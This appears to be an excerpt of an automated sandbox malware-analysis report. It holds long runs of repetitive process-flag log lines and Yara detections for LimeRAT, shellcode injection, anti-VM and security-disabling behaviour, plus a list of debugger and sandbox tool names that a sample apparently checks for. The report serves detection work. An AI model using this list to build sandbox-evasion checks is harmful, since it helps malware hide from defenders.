Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Yara detected LimeRAT
Source: Yara match File source: 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected generic Shellcode Injector
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected AntiVM3
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18299055991.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18328153087.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18302210268.0000015B1AF24000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18332249196.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18309001390.0000015B1AF24000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Windows Security Disabler
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: SUPERANTISPYWARE.EXE
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp Binary or memory string: PEID.EXE
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.18286537046.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp Binary or memory string: API_LOG.DLL
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !E!#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:COPYRENAMED!PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp Binary or memory string: "G!#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp Binary or memory string: "H!#SLF:AGGR:COPYRENAMED!PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: DBGHELP.DLLSBIEDLL.DLL
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: OLLYDBGOLLYICEPEDITORLORDPEC32ASMIMPORTREC.EXE
Source: MpSigStub.exe, 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXE
Source: MpSigStub.exe, 00000023.00000003.18334831739.0000015B1A746000.00000004.00000001.sdmp Binary or memory string: &[!#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
